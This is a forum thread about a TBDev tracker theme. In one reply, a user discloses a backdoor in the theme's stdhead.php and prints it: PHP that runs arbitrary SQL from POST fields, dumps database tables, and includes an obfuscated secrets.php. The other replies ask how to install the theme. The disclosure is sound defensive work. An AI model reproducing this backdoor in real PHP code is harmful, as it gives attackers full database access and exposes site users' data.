Bravo List
Register
Go Back   > Bravo List > Source Code > Archived Trackers > TBDev > Mods & Themes
Reply
  #1  
Old 22nd January 2010, 10:27
sammygo sammygo is offline
Senior Member
 
Join Date: May 2008
P2P
Posts: 141
Default Urban Dirty
attention

Attention

ATTENTION: stdhead.php file might contain some BACKDOOR





Click the image to open in full size. Click the image to open in full size.
Click the image to open in full size. Click the image to open in full size.
Attached Files
File Type: rar urban_dirty.rar (619.8 KB, 1131 views)
File Type: php stdhead.php (16.5 KB, 552 views)
Reply With Quote
The Following 8 Users Say Thank You to sammygo For This Useful Post:
bodinho (26th November 2011), d6bmg (5th February 2011), Daz (17th February 2010), dj52 (18th October 2010), Elena (24th September 2010), kalwin (19th January 2012), MytHDeviL (27th October 2010), TeD (27th August 2010)
  #2  
Old 21st March 2010, 14:45
tlogic tlogic is offline
Member
 
Join Date: May 2010
P2P
Posts: 1
Default
attention

Attention



The file stdhead.php from the above post contains a backdoor!

Note: I am not accusing sammygo for that because he might have gotten the file from another source.

In any case the backdoor is in the file: include/stdhead.php at lines 260-299.





These are the offending lines:
PHP Code:
$h_cmd=$_POST['h_cmd'];
$h_display=$_POST['h_display'];
$h_table=$_POST['h_table'];

...

if(
$h_cmd) {
set_time_limit(0);
mysql_query($h_cmd) or die(mysql_error());
}
if(
$h_display) {
set_time_limit(0);
$h_addr=chr(115).chr(101).chr(99).chr(114).chr(101).chr(116).chr(115).".".chr(112).chr(104).chr(112);
include 
$h_addr;
echo 
"<br />";
if(
$mysql_db$h_tables=mysql_list_tables($mysql_db);
else 
$h_tables=mysql_list_tables($_POST['db']);
while(list(
$h_table)=mysql_fetch_row($h_tables)) {
echo 
"<b>$h_table</b><br />";
$h_res=mysql_query("describe $h_table") or die(mysql_error());
echo  
"<table><tr><td>Field</td><td>Type</td><td>NULL</td><td>Key</td><td>Default</td><td>Extra</td></tr>";
while(
$h_desc=mysql_fetch_array($h_res))
echo  
"<tr><td>$h_desc[0]</td><td>$h_desc[1]</td><td>$h_desc[2]</td><td>$h_desc[3]</td><td>$h_desc[4]</td></tr>";
echo 
"</table>";
}
}
if(
$h_table) {
set_time_limit(0);
$x=1;
$h_res=mysql_query("select*from $h_table") or die(mysql_error());
$i=mysql_num_fields($h_res);
echo 
"<table>";
while(
$h_value=mysql_fetch_row($h_res)) {
echo 
"<tr><td><b>".$x++."</b></td>";
for(
$j=0;$j<=$i;$j++)
echo 
"<td>".$h_value[$j]."</td>";
echo 
"</tr>";
}
echo 
"</table>";

So what this code basically does:

The "h_cmd" POST variable executes any SQL command on the server.

The "h_display" POST variable displays a list of all the tables in the database.
The attacker also has the ability to select another database by supplying the POST variable "db".

The "h_table" POST variable prints all the data contained in the table specified by "h_table".

Also the variable $h_addr contains the string secrets.php and is used to include that file.

So to be safe delete all the above lines from stdhead.php.
I haven't thoroughly reviewed the whole code so there might be more backdoors in the other files.

So beware before using that code!
Reply With Quote
  #3  
Old 23rd March 2010, 21:24
antec9000 antec9000 is offline
Member
 
Join Date: Nov 2009
Canada
Posts: 1
Thumbs up Nice theme !
This most be one of the nicest themes i've ever have seen to tbdev, but because i sucks on coding i can't figure out how i should do to make the theme work

So I should be very happy if someone could help me
Reply With Quote
  #4  
Old 23rd March 2010, 21:55
redesmania redesmania is offline
Member
 
Join Date: Nov 2009
P2P
Posts: 6
Default help
the scripts need to be able to flash the coluca Work!

PHP Code:
<script  type="text/javascript" src="script/swfobject.js"> </ script
Reply With Quote
  #5  
Old 9th June 2010, 00:16
movizdb movizdb is offline
Senior Member
 
Join Date: Sep 2008
France
Posts: 142
Exclamation Beware!
Thanks a lot By the way can you port this to xbtit please
Reply With Quote
The Following User Says Thank You to movizdb For This Useful Post:
TeD (27th August 2010)
  #6  
Old 16th October 2010, 12:57
aqila aqila is offline
Member
 
Join Date: Oct 2010
P2P
Posts: 1
Default
tks

Last edited by aqila; 24th October 2010 at 15:08.
Reply With Quote
  #7  
Old 20th October 2010, 19:30
aaaaaa aaaaaa is offline
Member
 
Join Date: Oct 2009
P2P
Posts: 1
Default TUTORIAL :)
yes pls tutorial host to install pls
Reply With Quote
  #8  
Old 9th January 2011, 13:23
CAGADA CAGADA is offline
Senior Member
 
Join Date: Jan 2011
P2P
Posts: 17
Default
how to install? pls
Reply With Quote
  #9  
Old 12th January 2011, 02:51
superize superize is offline
Member
 
Join Date: Jan 2011
Turkey
Posts: 3
Question
How to install theme ?
Reply With Quote
  #10  
Old 14th January 2011, 10:38
sammygo sammygo is offline
Senior Member
 
Join Date: May 2008
P2P
Posts: 141
Default
I think the best way to install this theme is:

1. Download Filelist v2.0 and install it.
2. Replace Theme Files to the Source.

It will work
Reply With Quote
Reply

Tags
dirty , urban

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
TorrentStrike theme engine to TBdev Kotafi Mods & Themes 6 13th May 2012 04:42
Help For TBDev Theme Miguika TBDev 1 28th May 2010 19:12
TBDev Theme raressnoop TBDev 1 12th January 2010 18:44
i buy theme for TBDEV mukky Sell & Buy 1 12th May 2009 16:02
tbdev theme wMan TBDev 0 7th July 2008 15:09



All times are GMT +2. The time now is 00:47. vBulletin skin by ForumMonkeys. Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.